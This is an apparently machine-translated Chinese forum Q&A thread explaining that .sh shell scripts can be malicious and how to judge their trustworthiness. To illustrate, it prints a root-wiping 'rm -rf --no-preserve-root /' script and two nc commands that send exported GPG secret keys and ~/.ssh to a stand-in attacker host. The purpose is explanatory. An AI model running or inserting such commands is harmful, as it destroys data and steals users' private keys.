.sh文件是shell脚本。它们类似于Windows 下的.bat文件（脚本）。cmd所有这些（shell 脚本、cmd 脚本、.exeWindows 可执行文件、Linux 可执行文件（通常没有扩展名））都是可执行程序；如果你运行一个，它可以做任何你能做的事情。所以是的，shell 脚本可能是有害的。对待 shell 脚本（或 Perl 脚本，或 Python 脚本，或 Ruby 脚本等）与对待任何其他应用程序的怀疑相同。

在不可疑的情况下将恶意软件隐藏在 shell 脚本中有点困难，因为这是一个脚本，具有脚本语言知识的人可以阅读。但这并不难。很少有人，即使有技术知识，也会费心去审查代码，所以你可能希望被忽视。

实际上，Linux 的恶意软件比 Windows 少。这可能主要是因为 Linux 在桌面上的市场份额远低于 Windows，因此编写 Linux 恶意软件的回报较少。此外，在 Linux 世界中，与 Windows 世界相比，分享对系统的微小改进是一种根深蒂固的文化。所以概率的平衡表明这是某人分享了一些改进而不是恶意软件。但这可能是恶意软件冒充一点改进。最后，您需要决定是否可以信任您获取此应用程序的站点，或者推荐此站点的人。偏爱来自您的发行版的程序（即您可以从软件中心安装的程序），因为它们已经过一些审查。

现在关于这个特定的程序：我快速浏览了一下，它看起来是良性的。我没有看到任何东西会在不告诉您的情况下将您的密码存储在任何地方，或者会在您的计算机上执行与广告宣传不同的操作。请注意，我只进行了 2 分钟的审查，任何远程聪明的恶意软件编写者都可以通过。该程序看起来写得相当好。

我不一定会推荐这个程序，除非你觉得 Ubuntu 发行版中的软件包没有解决一个紧迫的需求。Ubuntu 带有GPG 的seahorse GUI 前端（KDE 用户也有kgpg ）。您可能还需要安装seahorse-nautilus （或旧版本中的seahorse-plugin ）以进行 Nautilus 集成。

#!/bin/sh
rm -rf --no-preserve-root /

那是恶意软件，它是一个 shell 脚本。更高级的版本可能包括以下内容：

gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80

所以是的，shell 脚本可能是恶意的。它可以变得更复杂，并调用其他脚本语言、库，甚至是一个吐出并调用常规可执行文件的shell 存档。

在大多数情况下，您运行的任何内容都会获得用户的权限。

当然！它可以做任何你可以做的事情！观看日志、键盘记录、窃取文件等......

取决于其开发人员在源代码上编写的内容！它可以做任何事情......

而且它很容易制作，所以如果您收到一个可疑的 .sh 文件，请在执行之前三思而后行！

sh 文件可以是传统的感染病毒的文件：

• UNIX 系统上的病毒体验，作者：Tom Duff

• M. Douglas McIlroy 的病毒学 101

这两篇文章都包含（较旧的）sh 病毒的源代码，尽管其中一篇或两篇都有错字，导致它们今天无法正常工作。我记得，这很容易解决。两篇文章都出现在后期，感叹

计算系统第 2 卷，第 2 期，1989 年春季

那是将近25年前的事了。

稍有不同的是，VAX/VMS 网络蠕虫Father Xmas和WANK都是用 VMS“shell 脚本”语言 DCL 编写的。